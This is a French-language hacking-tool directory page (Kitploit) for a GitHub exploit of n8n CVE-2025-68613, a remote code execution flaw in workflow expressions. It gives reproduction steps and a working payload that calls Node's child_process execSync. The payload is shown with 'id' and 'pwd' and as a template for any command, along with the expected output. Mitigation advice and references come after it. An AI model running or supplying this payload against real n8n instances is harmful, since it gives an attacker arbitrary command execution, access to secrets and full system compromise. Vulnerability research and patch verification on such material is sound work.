Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
n8n-CVE-2025-68613-exploit — CVE-2025-68613 : exploit et documentation de la vulnérabilité RCE de n8n | Kitploit
Outils/GitHubGitHub/wioui/n8n-cve-2025-68613-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubwioui/n8n-cve-2025-68613-exploit

n8n-CVE-2025-68613-exploit

CVE-2025-68613 : exploit et documentation de la vulnérabilité RCE de n8n

Voir le dépôt
106222il y a 8 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

n8n - CVE-2025-68613 : Contrôle inapproprié des ressources de code gérées dynamiquement

Vulnérabilité

n8n contient une vulnérabilité critique d'exécution de code arbitraire dans son système d'évaluation des expressions de workflows. Dans certaines conditions, les expressions fournies par des utilisateurs authentifiés lors de la configuration d'un workflow peuvent être évaluées dans un contexte d'exécution insuffisamment isolé du runtime sous-jacent.

Versions concernées

  • Vulnérables : n8n < v1.122.0
  • Corrigées : n8n >= v1.122.0

Prérequis

  • Accès authentifié à une instance n8n
  • Capacité de créer/modifier des workflows

Étapes de reproduction

1. Créer un nouveau workflow

  • Cliquer sur « Add workflow »

2. Ajouter les nœuds

  • Ajouter le nœud « Manual Trigger »
  • Ajouter le nœud « Set » (connecté au déclencheur)

3. Configurer le payload

  • Cliquer sur le nœud « Set »
  • Cliquer sur « Add Value » → Sélectionner « String »
  • Nommer le champ « result »
  • Cliquer sur l'icône « = » pour activer le mode expression

4. Injecter le payload

Collez ce payload dans le champ d'expression :

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

5. Exécuter

  • Cliquer sur « Execute step »
  • Vérifier la sortie du nœud « Set » pour le résultat de la commande

Démonstration de l'exploitation de CVE-2025-68613

Exemples de payloads

Commande ID :

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Commande PWD :

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

Modèle de commande personnalisée :

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}

Résultat attendu

Pour la commande id :

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

Pour la commande pwd :

root@kitploit:~
/app

Cause racine

L'évaluateur d'expressions ne dispose d'aucun mécanisme d'assainissement pour empêcher les expressions de fonction d'accéder à this.process (l'objet process de Node.js), ce qui permet d'accéder aux modules système.

Impact

  • Exécution de commandes arbitraires
  • Accès au système de fichiers
  • Exposition des variables d'environnement
  • Compromission totale du système

Atténuation

Mettez à niveau vers n8n v1.122.0 ou une version ultérieure.

Références

  • Correctif : https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
  • Dépôt : https://github.com/n8n-io/n8n
  • Article de blog : https://blog.ogwilliam.com/post/n8n-rce-vulnerability-cve-2025-68613

Avertissement : Ces informations sont fournies uniquement à des fins de sandbox et d'éducation. Toute utilisation non autorisée de ces informations pour exploiter des systèmes est illégale et contraire à l'éthique. Obtenez toujours une autorisation appropriée avant de tester ou d'exploiter des vulnérabilités.

Télécharger l’outil